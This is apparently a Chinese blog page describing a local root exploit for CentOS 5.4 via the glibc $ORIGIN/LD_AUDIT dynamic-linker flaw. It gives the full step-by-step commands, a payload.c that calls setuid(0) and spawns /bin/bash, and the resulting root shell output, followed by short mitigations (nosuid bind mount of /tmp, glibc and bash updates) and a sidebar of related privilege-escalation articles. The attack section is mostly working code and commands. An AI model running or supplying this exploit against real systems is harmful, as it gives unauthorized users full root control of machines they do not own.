linux5.4获取root权限,gcc++漏洞 普通用户获取root权限

最新推荐文章于 2023-08-01 17:43:41 发布
最新推荐文章于 2023-08-01 17:43:41 发布
阅读量251 收藏
点赞数
文章标签: linux5.4获取root权限

测试环境centos 5.4

参考文章;http://salogs.com/2010/12/linux-gcc-root/

[test2@wdj002 ~]$ mkdir /tmp/a

[test2@wdj002 ~]$ ln -s /bin/ls /tmp/a/b

[test2@wdj002 ~]$ exec 3< /tmp/a/b

[test2@wdj002 ~]$ ls -l /proc/5162/fd/3

lr-x------ 1 test2 test2 64 Mar  8 21:01 /proc/5162/fd/3 -> /bin/ls

[test2@wdj002 ~]$  gcc -w -fPIC -shared -o /tmp/a payload.c

[test2@wdj002 ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3

payload.c

[root@wdj002 ~]#  id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

payload.c内容如下

void __attribute__((constructor)) init()

{

setuid(0);

system("/bin/bash");

}

1,绑定目录

需要理解一下nosuid的原理:

我的理解是:比如/etc/passwd这个文件,本来只有root有权限修改,但是用户本身也可以去修改自己的密码,这就是一种“超出它本身权限的行为”,

nosuid就是为了停止这种提升特权的办法。比如/tmp目录就有这样的权限,我们就需要对它控制。

mount -o bind /tmp /tmp

mount -o remount,bind,nosuid /tmp /tmp

2,升级glibc版本(红帽官方提供的解决办法)

yum update  glibc

3、升级bash版本(本人在bash4.1测试没问题)

祲入风
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
GCC编译漏洞_普通用户提权root
用法之妙,存乎一心。
09-11 5801
#!/bin/bash #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> #writer:Lin-credible #function: YOUR UID WILL BE ZERO!JUST EXEC IT! #MAIL: lin-credible@hotmail.com #<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
linux gcc 权限不够,Linux gcc++漏洞普通用户获得root权限
weixin_28481133的博客
04-29 1448
Linux gcc++漏洞普通用户获得root权限,已经在RHEL5.5 32上测试过原理:The GNU C library dynamic linker expands $ORIGIN in setuid library search path1、创建一个普通测试用户:[root@ www.linuxidc.com ~]# useradd test[root@ www.linuxidc.c...
Linux提权————Linux下三种不同方式的提权技巧
Fly_鹏程万里
05-16 3869
在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。实验一:利用Linux内核漏洞提权VulnOS version 2是VulHub上的一个Linux提权练习,当打开虚拟机后,可以看到获取到低权限SHELL后我们通常做下面几件事1.检测操作系统的发...
linux5.4获取root权限,在redhat 5.4或suse 11以sudo执行需要root用户权限的命令
weixin_35278121的博客
05-01 286
前言在oracle用户编写一个shell,而其中某行代码需要执行root权限的命令,遂产生此文。结论1,sudo可以在非ROOT用户执行ROOT权限,其执行形式:[oracle@seconary ~]$ sudo mount /dev/sdb1 /oradata2,不配置SUDO相关配置文件/etc/sudoers,运行sudo会报oracle is not in the sudoers fil...
Redhat 8+Zabbix 5.4+MySQL 8+HTTP
02-28
包括创建 /data/mysql、/usr/local/mysql 和 /var/lib/mysql 目录,并将其权限设置为 mysql 用户。然后,需要添加 mysql 用户和组,用于管理 MySQL 数据库。 三、MySQL 8 的初始化 在 MySQL 安装完成后,需要初始...
oracle for linux radhat5.4安装
06-29
Linux Red Hat Enterprise Linux 5.4 (RHEL5.4)上安装Oracle数据库是一个涉及多个步骤的过程,这里我们将详细探讨这些步骤以及相关的知识点。 首先,Oracle数据库对系统的硬件和软件配置有一定的要求。在安装...
RHEL5.4+Aache2.2+Mysql5.1+PHP5.2+GD2.0
12-28
在RHEL5.4上,可以通过安装一系列RPM包来获取GCC,如kernel-headers、glibc-headers、glibc-devel、libgomp、gcc、libstdc++-devel和gcc-c++等。 **3. 安装GD库** GD库是PHP中用于处理图像的关键组件,支持GIF、...
VMWare7.0环境linux5.4安装oracle10G单实例
04-26
- 创建一个Oracle用户并切换到该用户,因为Oracle数据库推荐以非root用户身份进行安装。 - 解压Oracle软件包,进入解压后的目录,按照文档指导执行安装脚本。 - 设置环境变量,如ORACLE_HOME、PATH、LD_LIBRARY_...
Redhat_Enterprise_Linux_5.4+_ORACLE_10g安装具体图文步骤
06-13
在本文中,我们将详细探讨如何在Red Hat Enterprise Linux 5.4上安装Oracle 10g。这是一个系统管理员必备的技能,因为Oracle数据库是企业级应用广泛使用的数据库管理系统。以下是安装过程的关键步骤: 1. **硬件...
gcc 函数属性 attribute ((constructor))使用demo
02-09
gcc 函数属性 attribute ((constructor))使用demo demo演示了gpio_init(void) 和 key_init(void)如何设置__attribute__ ((constructor)) 属性,同时演示了添加key.c文件的不需要修改main.c的方法,此方法能减少对main.c的修改,也体现了软件设计--高内聚低耦合的思想。
linux gcc++漏洞普通用户获得root权限
dianchantuo7921的博客
07-20 186
linux gcc++漏洞普通用户获得root权限 2012-02-06 10:22:38|分类:linux安全|举报|字号订阅 经我测试在RHEL5 / CentOS5 / FC13都成功了。 首先介绍下一下具体步骤中涉及到的2个频繁的出现的词语: taviso:作者 Tavis Ormandy 的简称,G...
Linux中的提权操作
最新发布
weixin_52757485的博客
08-01 2134
具体工作过程:当用户执行sudo时,系统会主动寻找/etc/sudoers文件,判断该用户是否有执行sudo的权限,确认用户具有执行权限后,让用户输入用户自己的密码确认,若密码输入成功,则开始执行sudo后续的命令。临时提权的方法是用sudo的工作原理:将当前用户切换到超级用户下,以超级用户身份执行命令,执行完成后,直接退回到当前用户。[root@localhost ~]# vim /etc/sudoers (进入/etc/sudoers)(成功在普通用户下临时提权)
linux渗透与安全第三节 - 提权
收集盒 Book box
09-14 894
一些人一直觉得Linux提权是一项高深技术,其实Linux提权并不神秘。总结其步骤,可以简单分为5步: 1,获取webshell 2,具有执行command line权限,并获取Linux的系统版本 3,上传与Linux系统版本对应的漏洞提权脚本至可写可执行的目录下
linux各版本代码量,linux各版本对应溢出漏洞总结(溢出代码)
weixin_39980184的博客
05-03 138
记录一下。2.4.17newlocalkmod2.4.18brkbrk2newlocalkmodkm.22.4.19brkbrk2newlocalkmodkm.22.4.20ptracekmodptrace-kmodkm.2brkbrk22.4.21km.2brkbrk2ptraceptrace-kmod2.4.22km.2brk2brkptraceptrace-kmod2.4.22-10logi...
Netfilter Firewall 模块中最新 Linux 提权漏洞解读
告白的博客
03-21 573
Part1 漏洞描述 Linux 内核中新披露的安全漏洞在易受攻击的系统上获得提升的权限,以执行任意代码、逃逸容器或引发内核崩溃。Netfilter是Linux内核提供的框架,支持各种与网络相关的操作,包括数据包过滤,网络地址转换和端口转换,该漏洞被跟踪为 CVE-2022-25636(CVSS 分数:7.8) Part2 影响版本 Linux 内核版本 5.4 到 5.6.10 Part3 漏洞解读 Linux 内核 5.4 到 5.6.10 中的 net/netfilter/nf_dup_netdev.
linux漏洞,「漏洞通告」Linux Kernel 信息泄漏&权限提升漏洞(CVE-2020-8835)
weixin_42337065的博客
05-17 573
阅读:1,374一、漏洞概述3月31日,选手Manfred Paul在Pwn2Own比赛上用于演示Linux内核权限提升的漏洞被CVE收录,漏洞编号为CVE-2020-8835。此漏洞由于bpf验证系统在Linux内核中没有正确计算某些操作的寄存器限制,导致本地攻击者可以利用此缺陷越界读取机密信息(内核内存)或将用户提升为管理权限。请相关用户采取措施进行防护。参考链接:二、影响范围LinuxKe...
linux 提权漏洞分析,linux "io_uring" 提权漏洞(CVE-2019-19241)分析
weixin_27645199的博客
05-13 360
“io_uring” 是Linux在5.1版本开始添加的异步IO机制,5.3 版本的内核添加了sendmsg的支持,没有考虑到权限的问题,可能导致权限提升。前置知识IO_uring 简介io_uring 可以参考这篇文章), 写的很不错, Linux 上的异步IO的实现一直是一个问题,aio和epoll等都存在各种各样的不足,在Linux 5.1 版本中引入了一个新的异步IO框架io_uring主...
linux c root权限不够,linux gcc++漏洞普通用户获得root权限
weixin_31847389的博客
04-30 122
linux gcc++漏洞普通用户获得root权限*本内容参考自他人博客文章*Crushlinux 已经在RHEL5.5 32上测试过原理:The GNU C library dynamic linker expands $ORIGIN in setuid library search path1、创建一个普通测试用户:[root@crushlinux4 ~]# useradd test[roo...
Linux下简易入门:gcc+C编译器与开发环境
本文档主要介绍了在Linux环境下使用GCC编译器进行C/C++程序开发的基础知识,以及相关的开发工具环境设置。首先,开发工具包主要包括编辑工具(如vim和emacs)、编译工具(gcc)、调试工具(gdb)以及项目管理工具...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值